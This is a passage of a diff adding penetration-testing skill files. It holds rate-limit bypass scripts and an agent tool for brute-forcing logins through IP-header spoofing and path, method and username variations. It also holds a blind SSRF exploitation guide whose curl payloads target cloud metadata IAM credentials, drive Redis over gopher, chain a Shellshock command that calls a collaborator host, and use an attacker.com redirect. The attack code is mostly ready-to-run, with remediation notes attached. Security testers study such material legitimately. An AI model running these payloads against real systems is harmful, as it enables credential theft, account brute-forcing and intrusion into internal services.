+# Bypass Technique 3: Method and content-type switching
+def test_method_bypass(endpoint, original_body):
+    """Test if rate limit is method-specific."""
+    methods_to_test = ["POST", "PUT", "PATCH", "GET", "OPTIONS"]
+
+    content_types = [
+        "application/json",
+        "application/x-www-form-urlencoded",
+        "multipart/form-data",
+        "text/plain",
+        "application/xml",
+        "text/xml",
+    ]
+
+    # Trigger rate limit with POST + application/json
+    for i in range(200):
+        resp = requests.post(f"{BASE_URL}{endpoint}",
+                           headers={**headers, "Content-Type": "application/json"},
+                           json=original_body)
+        if resp.status_code == 429:
+            break
+
+    # Test other methods
+    for method in methods_to_test:
+        if method == "POST":
+            continue
+        resp = requests.request(method, f"{BASE_URL}{endpoint}",
+                              headers=headers, json=original_body)
+        if resp.status_code not in (429, 405):
+            print(f"[BYPASS] Method switch to {method}: {resp.status_code}")
+
+    # Test other content types
+    for ct in content_types:
+        if ct == "application/json":
+            continue
+        test_headers = {**headers, "Content-Type": ct}
+        if ct == "application/x-www-form-urlencoded":
+            data = "&".join(f"{k}={v}" for k, v in original_body.items())
+            resp = requests.post(f"{BASE_URL}{endpoint}", headers=test_headers, data=data)
+        else:
+            resp = requests.post(f"{BASE_URL}{endpoint}", headers=test_headers,
+                               data=str(original_body))
+        if resp.status_code != 429:
+            print(f"[BYPASS] Content-Type {ct}: {resp.status_code}")
+
+test_method_bypass("/auth/login", {"username": "test@example.com", "password": "wrong"})
+```
+
+### Step 5: Account-Level Bypass Techniques
+
+```python
+# Bypass Technique 4: Rotate identifiers to avoid per-account limits
+import string
+import random
+
+def test_account_rotation_bypass(login_endpoint, target_password_list):
+    """Test if rate limit is per-account, bypassed by rotating usernames."""
+    target_email = "victim@example.com"
+
+    # Test 1: Per-account rate limit bypass by rotating the username field
+    # with slight variations
+    email_variations = [
+        target_email,
+        target_email.upper(),
+        f" {target_email}",
+        f"{target_email} ",
+        target_email.replace("@", "%40"),
+        f"+tag@".join(target_email.split("@")),  # victim+tag@example.com
+    ]
+
+    for password in target_password_list[:50]:
+        for email_var in email_variations:
+            resp = requests.post(f"{BASE_URL}{login_endpoint}",
+                               json={"username": email_var, "password": password})
+            if resp.status_code == 200:
+                print(f"[SUCCESS] Logged in with: {email_var} / {password}")
+                return True
+            elif resp.status_code == 429:
+                print(f"Rate limited on variation: {email_var}")
+            # Small delay
+            time.sleep(0.1)
+
+    return False
+
+# Bypass Technique 5: Parameter pollution
+def test_parameter_pollution_bypass(endpoint):
+    """Add extra parameters to make each request appear unique."""
+    for i in range(200):
+        random_param = ''.join(random.choices(string.ascii_lowercase, k=8))
+        resp = requests.post(
+            f"{BASE_URL}{endpoint}?{random_param}={i}",
+            headers=headers,
+            json={"username": "test@example.com", "password": f"attempt_{i}"}
+        )
+        if resp.status_code == 429:
+            print(f"Parameter pollution failed at request {i+1}")
+            return False
+    print("[BYPASS] Parameter pollution: 200 requests without rate limit")
+    return True
+```
+
+### Step 6: Distributed and Async Testing
+
+```python
+import asyncio
+import aiohttp
+
+async def distributed_rate_limit_test(endpoint, total_requests=1000, concurrency=50):
+    """Test rate limiting under concurrent load."""
+    results = {"success": 0, "rate_limited": 0, "errors": 0}
+
+    async def make_request(session, request_num):
+        try:
+            # Rotate X-Forwarded-For per request
+            req_headers = {
+                **headers,
+                "X-Forwarded-For": f"192.168.{request_num % 256}.{(request_num * 3) % 256}"
+            }
+            async with session.post(
+                f"{BASE_URL}{endpoint}",
+                headers=req_headers,
+                json={"username": "test@example.com", "password": f"attempt_{request_num}"}
+            ) as resp:
+                if resp.status == 429:
+                    results["rate_limited"] += 1
+                elif resp.status in (200, 401):
+                    results["success"] += 1
+                else:
+                    results["errors"] += 1
+        except Exception:
+            results["errors"] += 1
+
+    connector = aiohttp.TCPConnector(limit=concurrency)
+    async with aiohttp.ClientSession(connector=connector) as session:
+        tasks = [make_request(session, i) for i in range(total_requests)]
+        await asyncio.gather(*tasks)
+
+    print(f"\nDistributed Test Results:")
+    print(f"  Successful: {results['success']}")
+    print(f"  Rate Limited: {results['rate_limited']}")
+    print(f"  Errors: {results['errors']}")
+    print(f"  Bypass Rate: {results['success']/(results['success']+results['rate_limited'])*100:.1f}%")
+
+# asyncio.run(distributed_rate_limit_test("/auth/login"))
+```
+
+## Key Concepts
+
+| Term | Definition |
+|------|------------|
+| **Rate Limiting** | Controlling the number of requests a client can make to an API within a time window, typically enforced per IP, per user, or per API key |
+| **Unrestricted Resource Consumption** | OWASP API4:2023 - APIs that do not properly limit the size or number of resources requested, enabling DoS or brute force attacks |
+| **X-Forwarded-For Spoofing** | Manipulating the X-Forwarded-For header to make the server believe requests originate from different IP addresses, bypassing IP-based rate limits |
+| **Credential Stuffing** | Automated injection of stolen username/password pairs against login endpoints, requiring rate limit bypass for large-scale attacks |
+| **Token Bucket** | Rate limiting algorithm that allows bursts of requests up to a bucket size, refilling at a constant rate |
+| **Sliding Window** | Rate limiting algorithm that tracks requests in a rolling time window, more resistant to burst attacks than fixed windows |
+
+## Tools & Systems
+
+- **Burp Suite Turbo Intruder**: High-performance request sender for rate limit testing using Python-based scripting engine
+- **ffuf**: Fast web fuzzer capable of testing rate limits with configurable request rates and header manipulation
+- **wfuzz**: Web fuzzer with support for header injection, parameter fuzzing, and rate limit evasion techniques
+- **Postman Collection Runner**: Automated collection execution with variable rotation for rate limit bypass testing
+- **Gatling/k6**: Load testing tools that simulate realistic traffic patterns to test rate limiting under production-like conditions
+
+## Common Scenarios
+
+### Scenario: Login API Rate Limit Bypass Assessment
+
+**Context**: A financial services API implements rate limiting on the login endpoint to prevent brute force attacks. The security team wants to verify the effectiveness of these controls before a compliance audit.
+
+**Approach**:
+1. Baseline: Send 100 requests to `POST /api/v1/auth/login` - rate limited at request 10 per minute per IP
+2. Test X-Forwarded-For rotation: Send 100 requests with unique X-Forwarded-For values - rate limit bypassed (all requests return 401, not 429)
+3. Test path variation: `/api/v1/auth/login/` (trailing slash) resets the rate limit counter
+4. Test API versioning: `/api/v2/auth/login` has no rate limiting configured (shadow API)
+5. Test parameter pollution: Adding `?_=<random>` to each request bypasses the rate limit
+6. Test concurrent requests: 50 simultaneous requests from same IP - 45 succeed before rate limit kicks in (race condition in counter)
+7. Determine that rate limiting is implemented at the nginx reverse proxy level using IP-only tracking, trusting X-Forwarded-For header without validation
+
+**Pitfalls**:
+- Sending too many requests too fast and causing actual denial of service to the test environment
+- Not testing rate limits on password reset, MFA verification, and account enumeration endpoints
+- Assuming the rate limit applies globally when it may be per-endpoint or per-method only
+- Missing race conditions in rate limit counters that allow burst bypasses
+- Not testing both authenticated and unauthenticated rate limiting separately
+
+## Output Format
+
+```
+## Finding: Rate Limiting Bypass via X-Forwarded-For Header Spoofing
+
+**ID**: API-RATE-001
+**Severity**: High (CVSS 7.3)
+**OWASP API**: API4:2023 - Unrestricted Resource Consumption
+**Affected Endpoints**:
+  - POST /api/v1/auth/login
+  - POST /api/v1/auth/forgot-password
+  - POST /api/v1/auth/verify-mfa
+
+**Description**:
+The API rate limiting implementation relies on the X-Forwarded-For header
+to identify client IP addresses. Since the application sits behind a load
+balancer that does not strip or validate this header, an attacker can set
+arbitrary X-Forwarded-For values to bypass the 10 requests/minute rate limit
+on authentication endpoints.
+
+**Bypass Methods Confirmed**:
+1. X-Forwarded-For rotation: 1000 login attempts in 60 seconds (vs 10 limit)
+2. Trailing slash path variation: /auth/login/ treated as separate endpoint
+3. API v2 endpoint: No rate limiting configured
+4. Race condition: 50 concurrent requests, 45 succeed before counter updates
+
+**Impact**:
+An attacker can perform unlimited brute force attacks against any user
+account, bypassing the rate limit designed to prevent credential stuffing.
+At 1000 attempts per minute, a 6-digit PIN can be brute-forced in under
+17 minutes.
+
+**Remediation**:
+1. Configure the load balancer to set X-Forwarded-For and strip client-provided values
+2. Implement rate limiting at the application layer using authenticated user ID, not just IP
+3. Normalize URL paths before applying rate limit rules (strip trailing slashes, enforce lowercase)
+4. Apply rate limits consistently across all API versions and content types
+5. Use atomic rate limit counters (Redis INCR) to prevent race conditions
+6. Implement progressive delays (exponential backoff) in addition to hard limits
+```

--- a/security/skills/performing-api-rate-limiting-bypass/references/api-reference.md
+++ b/security/skills/performing-api-rate-limiting-bypass/references/api-reference.md
@@ -1,0 +1,57 @@
+# API Rate Limiting Bypass — API Reference
+
+## Libraries
+
+| Library | Install | Purpose |
+|---------|---------|---------|
+| requests | `pip install requests` | HTTP request sending with custom headers |
+
+## Rate Limit Response Headers
+
+| Header | Description |
+|--------|-------------|
+| `X-RateLimit-Limit` | Maximum requests per window |
+| `X-RateLimit-Remaining` | Requests remaining in window |
+| `X-RateLimit-Reset` | Timestamp when limit resets |
+| `Retry-After` | Seconds to wait before retrying |
+| `RateLimit-Policy` | IETF draft rate limit policy |
+
+## IP Spoofing Bypass Headers
+
+| Header | Description |
+|--------|-------------|
+| `X-Forwarded-For` | Standard proxy forwarding header |
+| `X-Real-IP` | NGINX real client IP |
+| `X-Originating-IP` | Client originating IP |
+| `X-Client-IP` | Client IP identifier |
+| `True-Client-IP` | Akamai/CDN client IP |
+| `CF-Connecting-IP` | Cloudflare client IP |
+| `Forwarded` | RFC 7239 forwarded header |
+
+## Bypass Techniques
+
+| Technique | Description | Severity |
+|-----------|-------------|----------|
+| Header IP rotation | Rotate X-Forwarded-For per request | HIGH |
+| HTTP method switching | GET rate-limited but POST is not | MEDIUM |
+| Path variation | `/api/users` vs `/api/users/` | MEDIUM |
+| Case variation | `/API/Users` vs `/api/users` | MEDIUM |
+| URL encoding | `%2Fapi%2Fusers` instead of `/api/users` | MEDIUM |
+| Null byte injection | Append `%00` to URL path | HIGH |
+| API version switching | `/v1/users` vs `/v2/users` | MEDIUM |
+| Parameter pollution | Duplicate query parameters | MEDIUM |
+
+## OWASP API4:2023 — Unrestricted Resource Consumption
+
+| Risk | Description |
+|------|-------------|
+| Missing rate limits | No throttling on sensitive endpoints |
+| Per-IP only limits | Bypassed with header spoofing |
+| No auth-based limiting | Rate limit tied to IP, not user |
+| Inconsistent enforcement | Different limits per method/version |
+
+## External References
+
+- [OWASP API Security Top 10](https://owasp.org/API-Security/)
+- [IETF RateLimit Header Fields](https://datatracker.ietf.org/doc/draft-ietf-httpapi-ratelimit-headers/)
+- [HackTricks Rate Limit Bypass](https://book.hacktricks.xyz/pentesting-web/rate-limit-bypass)

--- a/security/skills/performing-api-rate-limiting-bypass/scripts/agent.py
+++ b/security/skills/performing-api-rate-limiting-bypass/scripts/agent.py
@@ -1,0 +1,262 @@
+#!/usr/bin/env python3
+# For authorized testing only
+"""API rate limiting bypass testing agent."""
+
+import json
+import sys
+import argparse
+from datetime import datetime
+
+try:
+    import requests
+except ImportError:
+    print("Install: pip install requests")
+    sys.exit(1)
+
+
+BYPASS_HEADERS = [
+    {"X-Forwarded-For": "127.0.0.1"},
+    {"X-Forwarded-For": "10.0.0.1"},
+    {"X-Real-IP": "127.0.0.1"},
+    {"X-Originating-IP": "127.0.0.1"},
+    {"X-Client-IP": "192.168.1.1"},
+    {"X-Forwarded-Host": "localhost"},
+    {"True-Client-IP": "127.0.0.1"},
+    {"CF-Connecting-IP": "127.0.0.1"},
+    {"X-Custom-IP-Authorization": "127.0.0.1"},
+    {"Forwarded": "for=127.0.0.1"},
+]
+
+
+def detect_rate_limit_headers(url, auth_header=None):
+    """Send initial request and extract rate limit response headers."""
+    headers = {"User-Agent": "RateLimit-Tester/1.0"}
+    if auth_header:
+        headers["Authorization"] = auth_header
+    try:
+        resp = requests.get(url, headers=headers, timeout=10)
+        rate_headers = {}
+        for key in resp.headers:
+            lower = key.lower()
+            if any(rl in lower for rl in ["ratelimit", "rate-limit", "x-rate",
+                                           "retry-after", "x-ratelimit"]):
+                rate_headers[key] = resp.headers[key]
+        return {
+            "url": url,
+            "status": resp.status_code,
+            "rate_limit_headers": rate_headers,
+            "has_rate_limiting": len(rate_headers) > 0,
+        }
+    except Exception as e:
+        return {"url": url, "error": str(e)}
+
+
+def test_header_bypass(url, auth_header=None, request_count=30):
+    """Test rate limit bypass via IP spoofing headers."""
+    findings = []
+    base_headers = {"User-Agent": "RateLimit-Tester/1.0"}
+    if auth_header:
+        base_headers["Authorization"] = auth_header
+
+    for i in range(request_count):
+        try:
+            resp = requests.get(url, headers=base_headers, timeout=5)
+            if resp.status_code == 429:
+                baseline_hit = i + 1
+                break
+        except Exception:
+            pass
+    else:
+        findings.append({
+            "test": "baseline",
+            "issue": f"No rate limit hit after {request_count} requests",
+            "severity": "HIGH",
+        })
+        return findings
+
+    for bypass in BYPASS_HEADERS:
+        test_headers = {**base_headers, **bypass}
+        header_name = list(bypass.keys())[0]
+        success_count = 0
+        for i in range(10):
+            bypass[header_name] = f"10.{i}.{i}.{i}"
+            test_headers = {**base_headers, **bypass}
+            try:
+                resp = requests.get(url, headers=test_headers, timeout=5)
+                if resp.status_code != 429:
+                    success_count += 1
+            except Exception:
+                pass
+
+        if success_count > 5:
+            findings.append({
+                "test": "header_bypass",
+                "header": header_name,
+                "issue": f"Rate limit bypassed using {header_name} header ({success_count}/10 successful)",
+                "severity": "HIGH",
+            })
+    return findings
+
+
+def test_method_bypass(url, auth_header=None):
+    """Test if rate limiting applies across HTTP methods."""
+    methods = ["GET", "POST", "PUT", "PATCH", "HEAD", "OPTIONS"]
+    findings = []
+    headers = {"User-Agent": "RateLimit-Tester/1.0"}
+    if auth_header:
+        headers["Authorization"] = auth_header
+
+    method_results = {}
+    for method in methods:
+        try:
+            resp = requests.request(method, url, headers=headers, timeout=5)
+            method_results[method] = resp.status_code
+        except Exception:
+            method_results[method] = "error"
+
+    rate_limited = [m for m, s in method_results.items() if s == 429]
+    not_limited = [m for m, s in method_results.items() if isinstance(s, int) and s != 429]
+
+    if rate_limited and not_limited:
+        findings.append({
+            "test": "method_bypass",
+            "rate_limited": rate_limited,
+            "not_limited": not_limited,
+            "issue": f"Rate limit not applied to methods: {', '.join(not_limited)}",
+            "severity": "MEDIUM",
+        })
+    return findings
+
+
+def test_path_bypass(url, auth_header=None):
+    """Test rate limit bypass via URL path manipulation."""
+    from urllib.parse import urlparse
+    parsed = urlparse(url)
+    path = parsed.path
+
+    path_variations = [
+        path + "/",
+        path + "?",
+        path + "#",
+        path.upper(),
+        path + "%20",
+        path + ";",
+        path.replace("/", "//"),
+        path + "/.",
+        path + "/..",
+    ]
+
+    findings = []
+    headers = {"User-Agent": "RateLimit-Tester/1.0"}
+    if auth_header:
+        headers["Authorization"] = auth_header
+
+    for variant in path_variations:
+        test_url = f"{parsed.scheme}://{parsed.netloc}{variant}"
+        try:
+            resp = requests.get(test_url, headers=headers, timeout=5, allow_redirects=False)
+            if resp.status_code not in (429, 404, 301, 302):
+                findings.append({
+                    "test": "path_bypass",
+                    "original": path,
+                    "variant": variant,
+                    "status": resp.status_code,
+                    "issue": f"Path variation '{variant}' bypasses rate limit (status {resp.status_code})",
+                    "severity": "MEDIUM",
+                })
+        except Exception:
+            pass
+    return findings
+
+
+def test_encoding_bypass(url, auth_header=None):
+    """Test rate limit bypass via parameter encoding variations."""
+    from urllib.parse import urlparse, parse_qs
+    parsed = urlparse(url)
+    params = parse_qs(parsed.query)
+    findings = []
+    headers = {"User-Agent": "RateLimit-Tester/1.0"}
+    if auth_header:
+        headers["Authorization"] = auth_header
+
+    null_byte_url = url + "%00"
+    try:
+        resp = requests.get(null_byte_url, headers=headers, timeout=5)
+        if resp.status_code != 429:
+            findings.append({
+                "test": "null_byte_bypass",
+                "status": resp.status_code,
+                "issue": "Null byte appended bypasses rate limit",
+                "severity": "HIGH",
+            })
+    except Exception:
+        pass
+
+    return findings
+
+
+def run_audit(args):
+    """Execute API rate limiting bypass audit."""
+    print(f"\n{'='*60}")
+    print(f"  API RATE LIMITING BYPASS TESTING")
+    print(f"  Generated: {datetime.utcnow().isoformat()} UTC")
+    print(f"{'='*60}\n")
+
+    report = {}
+    all_findings = []
+
+    detection = detect_rate_limit_headers(args.url, args.auth)
+    report["rate_limit_detection"] = detection
+    print(f"--- RATE LIMIT DETECTION ---")
+    print(f"  URL: {detection.get('url','')}")
+    print(f"  Has Rate Limiting: {detection.get('has_rate_limiting', False)}")
+    for k, v in detection.get("rate_limit_headers", {}).items():
+        print(f"  {k}: {v}")
+
+    if args.test_headers:
+        header_findings = test_header_bypass(args.url, args.auth, args.request_count)
+        all_findings.extend(header_findings)
+        print(f"\n--- HEADER BYPASS ({len(header_findings)} findings) ---")
+        for f in header_findings:
+            print(f"  [{f['severity']}] {f['issue']}")
+
+    if args.test_methods:
+        method_findings = test_method_bypass(args.url, args.auth)
+        all_findings.extend(method_findings)
+        print(f"\n--- METHOD BYPASS ({len(method_findings)} findings) ---")
+        for f in method_findings:
+            print(f"  [{f['severity']}] {f['issue']}")
+
+    if args.test_paths:
+        path_findings = test_path_bypass(args.url, args.auth)
+        all_findings.extend(path_findings)
+        print(f"\n--- PATH BYPASS ({len(path_findings)} findings) ---")
+        for f in path_findings:
+            print(f"  [{f['severity']}] {f['issue']}")
+
+    report["findings"] = all_findings
+    report["total_findings"] = len(all_findings)
+    return report
+
+
+def main():
+    parser = argparse.ArgumentParser(description="API Rate Limiting Bypass Tester")
+    parser.add_argument("--url", required=True, help="Target API endpoint URL")
+    parser.add_argument("--auth", help="Authorization header value")
+    parser.add_argument("--request-count", type=int, default=30,
+                        help="Requests for baseline detection (default: 30)")
+    parser.add_argument("--test-headers", action="store_true", help="Test header-based bypasses")
+    parser.add_argument("--test-methods", action="store_true", help="Test HTTP method bypasses")
+    parser.add_argument("--test-paths", action="store_true", help="Test URL path bypasses")
+    parser.add_argument("--output", help="Save report to JSON file")
+    args = parser.parse_args()
+
+    report = run_audit(args)
+    if args.output:
+        with open(args.output, "w") as f:
+            json.dump(report, f, indent=2, default=str)
+        print(f"\n[+] Report saved to {args.output}")
+
+
+if __name__ == "__main__":
+    main()

--- a/security/skills/performing-blind-ssrf-exploitation/SKILL.md
+++ b/security/skills/performing-blind-ssrf-exploitation/SKILL.md
@@ -1,0 +1,254 @@
+---
+name: performing-blind-ssrf-exploitation
+description: Detect and exploit blind Server-Side Request Forgery vulnerabilities
+  using out-of-band techniques, DNS interactions, and timing analysis to access internal
+  services and cloud metadata endpoints.
+domain: cybersecurity
+subdomain: web-application-security
+tags:
+- blind-ssrf
+- ssrf
+- out-of-band
+- burp-collaborator
+- cloud-metadata
+- internal-network
+- oob-detection
+version: '1.0'
+author: mahipal
+license: Apache-2.0
+nist_csf:
+- PR.PS-01
+- ID.RA-01
+- PR.DS-10
+- DE.CM-01
+mitre_attack:
+- T1190
+- T1059.007
+- T1505.003
+- T1083
+- T1078.004
+---
+
+# Performing Blind SSRF Exploitation
+
+## When to Use
+- When testing URL/webhook input parameters where server-side responses are not reflected
+- During assessment of applications that fetch external resources (avatars, previews, imports)
+- When testing PDF generators, image processors, or document converters for SSRF
+- During cloud security assessments to detect metadata endpoint access
+- When evaluating webhook functionality and URL validation implementations
+
+## Prerequisites
+- Burp Suite Professional with Burp Collaborator for OOB detection
+- interact.sh or webhook.site for external callback monitoring
+- Understanding of SSRF attack vectors and internal network enumeration
+- Knowledge of cloud metadata endpoints (AWS, GCP, Azure)
+- VPS or controlled server for advanced exploitation callback handling
+- Python with requests library for automation scripts
+
+## Workflow
+
+### Step 1 — Identify Blind SSRF Input Points
+```bash
+# Common SSRF-susceptible parameters:
+# url=, uri=, path=, dest=, redirect=, src=, source=
+# link=, imageURL=, callback=, webhook=, feed=, import=
+
+# Test URL fetch functionality
+curl -X POST http://target.com/api/fetch-url \
+  -H "Content-Type: application/json" \
+  -d '{"url": "http://BURP-COLLABORATOR-SUBDOMAIN.oastify.com"}'
+
+# Test webhook configuration
+curl -X POST http://target.com/api/webhooks \
+  -H "Authorization: Bearer TOKEN" \
+  -H "Content-Type: application/json" \
+  -d '{"callback_url": "http://COLLABORATOR.oastify.com/webhook"}'
+
+# Test image/avatar URL
+curl -X POST http://target.com/api/profile/avatar \
+  -H "Authorization: Bearer TOKEN" \
+  -H "Content-Type: application/json" \
+  -d '{"avatar_url": "http://COLLABORATOR.oastify.com/avatar.png"}'
+
+# Test document import
+curl -X POST http://target.com/api/import \
+  -H "Content-Type: application/json" \
+  -d '{"import_url": "http://COLLABORATOR.oastify.com/data.csv"}'
+```
+
+### Step 2 — Confirm Blind SSRF with Out-of-Band Detection
+```bash
+# Use Burp Collaborator for DNS + HTTP callbacks
+# Generate collaborator payload: xxxxxx.oastify.com
+
+# DNS-based detection (works even with HTTP blocked)
+curl -X POST http://target.com/api/fetch \
+  -d '{"url": "http://dns-only-test.COLLABORATOR.oastify.com"}'
+# Check Collaborator for DNS lookups
+
+# HTTP-based detection
+curl -X POST http://target.com/api/fetch \
+  -d '{"url": "http://http-test.COLLABORATOR.oastify.com"}'
+# Check for HTTP requests in Collaborator
+
+# interact.sh alternative
+curl -X POST http://target.com/api/fetch \
+  -d '{"url": "http://RANDOM.interact.sh"}'
+# Monitor interact.sh dashboard for interactions
+```
+
+### Step 3 — Enumerate Internal Network
+```bash
+# Scan internal IP ranges via blind SSRF
+# Use timing differences to determine if hosts are alive
+
+# Scan common internal ranges
+for ip in 10.0.0.{1..10} 172.16.0.{1..10} 192.168.1.{1..10}; do
+  start=$(date +%s%N)
+  curl -X POST http://target.com/api/fetch -d "{\"url\": \"http://$ip/\"}" -s -o /dev/null --max-time 5
+  end=$(date +%s%N)
+  elapsed=$(( (end - start) / 1000000 ))
+  echo "$ip: ${elapsed}ms"
+done
+
+# Port scanning via blind SSRF
+for port in 80 443 8080 8443 3000 5000 6379 27017 5432 3306 9200; do
+  curl -X POST http://target.com/api/fetch \
+    -d "{\"url\": \"http://127.0.0.1:$port/\"}" -s -o /dev/null -w "%{time_total}\n"
+  echo "Port $port tested"
+done
+
+# Use gopher:// for more advanced internal service interaction
+curl -X POST http://target.com/api/fetch \
+  -d '{"url": "gopher://127.0.0.1:6379/_INFO"}'
+```
+
+### Step 4 — Access Cloud Metadata Endpoints
+```bash
+# AWS metadata (IMDSv1)
+curl -X POST http://target.com/api/fetch \
+  -d '{"url": "http://169.254.169.254/latest/meta-data/"}'
+
+# AWS IAM credentials
+curl -X POST http://target.com/api/fetch \
+  -d '{"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}'
+
+# GCP metadata
+curl -X POST http://target.com/api/fetch \
+  -d '{"url": "http://metadata.google.internal/computeMetadata/v1/"}'
+
+# Azure metadata
+curl -X POST http://target.com/api/fetch \
+  -d '{"url": "http://169.254.169.254/metadata/instance?api-version=2021-02-01"}'
+
+# DNS rebinding for metadata access (bypass IP blocking)
+# Use services like rebinder.net to create DNS rebinding domains
+curl -X POST http://target.com/api/fetch \
+  -d '{"url": "http://A.169.254.169.254.1time.YOUR-REBIND-DOMAIN.com/"}'
+```
+
+### Step 5 — Bypass SSRF Filters
+```bash
+# IP representation bypass
+curl -X POST http://target.com/api/fetch -d '{"url": "http://0x7f000001/"}'       # Hex
+curl -X POST http://target.com/api/fetch -d '{"url": "http://2130706433/"}'         # Decimal
+curl -X POST http://target.com/api/fetch -d '{"url": "http://0177.0.0.1/"}'         # Octal
+curl -X POST http://target.com/api/fetch -d '{"url": "http://127.1/"}'              # Short
+curl -X POST http://target.com/api/fetch -d '{"url": "http://[::1]/"}'              # IPv6
+
+# URL parsing confusion
+curl -X POST http://target.com/api/fetch -d '{"url": "http://target.com@127.0.0.1/"}'
+curl -X POST http://target.com/api/fetch -d '{"url": "http://127.0.0.1#@target.com/"}'
+
+# Redirect-based bypass
+curl -X POST http://target.com/api/fetch \
+  -d '{"url": "http://attacker.com/redirect?url=http://169.254.169.254/"}'
+
+# DNS rebinding
+curl -X POST http://target.com/api/fetch \
+  -d '{"url": "http://make-169-254-169-254-rr.1u.ms/"}'
+```
+
+### Step 6 — Escalate Blind SSRF to Data Exfiltration
+```bash
+# Exfiltrate data via DNS (when only DNS callback works)
+# If you achieve SSRF to a service that reflects data:
+# Chain: SSRF -> internal service -> DNS exfiltration
+
+# Use gopher protocol for Redis command execution
+curl -X POST http://target.com/api/fetch \
+  -d '{"url": "gopher://127.0.0.1:6379/_SET%20ssrf_test%20exploited%0AQUIT"}'
+
+# Chain blind SSRF with Shellshock on internal hosts
+curl -X POST http://target.com/api/fetch \
+  -d '{"url": "http://internal-cgi-server/cgi-bin/test.sh"}'
+# With User-Agent: () { :; }; /bin/bash -c "ping -c1 COLLABORATOR.oastify.com"
+
+# Exploit internal services via SSRF
+# Redis: write SSH key
+# Memcached: inject serialized objects
+# Elasticsearch: read indices
+# Internal API: access authenticated endpoints
+```
+
+## Key Concepts
+
+| Concept | Description |
+|---------|-------------|
+| Blind SSRF | Server makes request but response is not visible to attacker |
+| Out-of-Band Detection | Using external callbacks (DNS, HTTP) to confirm SSRF execution |
+| DNS Rebinding | Technique to bypass IP-based SSRF filters by changing DNS resolution |
+| Cloud Metadata | Instance metadata endpoints accessible via SSRF for credential theft |
+| Gopher Protocol | Protocol allowing crafted payloads to interact with internal TCP services |
+| Time-Based Detection | Detecting SSRF success by measuring response time differences |
+| SSRF Chain | Combining SSRF with other vulnerabilities for greater impact |
+
+## Tools & Systems
+
+| Tool | Purpose |
+|------|---------|
+| Burp Collaborator | Out-of-band interaction server for DNS and HTTP callback detection |
+| interact.sh | Open-source OOB interaction tool by ProjectDiscovery |
+| SSRFmap | Automated SSRF detection and exploitation framework |
+| Gopherus | Generate gopher payloads for exploiting internal services via SSRF |
+| webhook.site | Free webhook receiver for testing SSRF callbacks |
+| rebinder.net | DNS rebinding service for bypassing SSRF IP filters |
+
+## Common Scenarios
+
+1. **Cloud Credential Theft** — Exploit blind SSRF to access AWS/GCP/Azure metadata endpoints and steal IAM credentials for cloud account compromise
+2. **Internal Service Discovery** — Use timing-based blind SSRF to enumerate internal network hosts and open ports
+3. **Redis Exploitation** — Chain blind SSRF with gopher:// protocol to execute commands on internal Redis instances
+4. **Webhook Abuse** — Exploit webhook URL fields to scan internal networks and exfiltrate data through OOB channels
+5. **PDF Generator SSRF** — Inject internal URLs into PDF generation features to exfiltrate internal content in rendered documents
+
+## Output Format
+
+```
+## Blind SSRF Assessment Report
+- **Target**: http://target.com/api/fetch-url
+- **Detection Method**: Burp Collaborator DNS + HTTP callback
+- **Internal Access Confirmed**: Yes
+
+### Findings
+| # | Input Point | Payload | Detection | Impact |
+|---|------------|---------|-----------|--------|
+| 1 | POST /api/fetch url parameter | http://collaborator | HTTP callback | Confirmed SSRF |
+| 2 | POST /api/avatar avatar_url | http://169.254.169.254 | Timing (2.3s vs 0.1s) | Cloud metadata |
+| 3 | POST /api/webhook callback | gopher://127.0.0.1:6379 | Redis write confirmed | RCE potential |
+
+### Internal Network Map
+| Host | Port | Service | Accessible |
+|------|------|---------|-----------|
+| 10.0.0.5 | 6379 | Redis | Yes |
+| 10.0.0.10 | 9200 | Elasticsearch | Yes |
+| 169.254.169.254 | 80 | AWS Metadata | Yes |
+
+### Remediation
+- Implement allowlist of permitted external domains for URL fetching
+- Block requests to private IP ranges and cloud metadata endpoints
+- Use IMDSv2 (token-required) for AWS instance metadata
+- Disable unused URL schemes (gopher, file, dict)
+- Implement network-level segmentation for application servers
+```

--- a/security/skills/performing-blind-ssrf-exploitation/references/api-reference.md
+++ b/security/skills/performing-blind-ssrf-exploitation/references/api-reference.md
@@ -1,0 +1,177 @@
+# API Reference: Blind SSRF Exploitation
+
+## Libraries Used
+
+| Library | Purpose |
+|---------|---------|
+| `requests` | Send crafted HTTP requests with SSRF payloads |
+| `socket` | Low-level port scanning and connection testing |
+| `http.server` | Out-of-band callback listener for blind detection |
+| `urllib.parse` | Construct and encode SSRF payload URLs |
+| `time` | Measure response timing for time-based blind SSRF |
+
+## Installation
+
+```bash
+pip install requests
+```
+
+## Techniques and Payloads
+
+### Cloud Metadata Endpoints
+
+| Cloud Provider | Metadata URL |
+|----------------|-------------|
+| AWS IMDSv1 | `http://169.254.169.254/latest/meta-data/` |
+| AWS IMDSv2 | Requires `X-aws-ec2-metadata-token` header |
+| GCP | `http://metadata.google.internal/computeMetadata/v1/` |
+| Azure | `http://169.254.169.254/metadata/instance?api-version=2021-02-01` |
+| DigitalOcean | `http://169.254.169.254/metadata/v1/` |
+| Oracle Cloud | `http://169.254.169.254/opc/v2/instance/` |
+
+### Internal Network Scanning Payloads
+```python
+# Common internal targets for blind SSRF probing
+INTERNAL_TARGETS = [
+    "http://127.0.0.1:{port}",
+    "http://localhost:{port}",
+    "http://0.0.0.0:{port}",
+    "http://[::1]:{port}",
+    "http://10.0.0.1:{port}",
+    "http://192.168.1.1:{port}",
+    "http://172.16.0.1:{port}",
+]
+
+COMMON_PORTS = [22, 80, 443, 3306, 5432, 6379, 8080, 8443, 9200, 27017]
+```
+
+## Core Functions
+
+### Out-of-Band (OOB) Blind SSRF Detection
+```python
+import requests
+import threading
+from http.server import HTTPServer, BaseHTTPRequestHandler
+
+class CallbackHandler(BaseHTTPRequestHandler):
+    received = []
+
+    def do_GET(self):
+        CallbackHandler.received.append({
+            "path": self.path,
+            "headers": dict(self.headers),
+            "client": self.client_address[0],
+        })
+        self.send_response(200)
+        self.end_headers()
+
+    def log_message(self, format, *args):
+        pass  # Suppress console output
+
+def start_callback_server(port=8888):
+    server = HTTPServer(("0.0.0.0", port), CallbackHandler)
+    thread = threading.Thread(target=server.serve_forever, daemon=True)
+    thread.start()
+    return server
+
+def test_blind_ssrf_oob(target_url, param_name, callback_url):
+    """Test for blind SSRF using OOB callback."""
+    payload = callback_url + "/ssrf-test"
+    resp = requests.get(
+        target_url,
+        params={param_name: payload},
+        timeout=10,
+    )
+    return resp.status_code
+```
+
+### Time-Based Blind SSRF Detection
+```python
+import time
+
+def test_time_based_ssrf(target_url, param_name, open_port_url, closed_port_url):
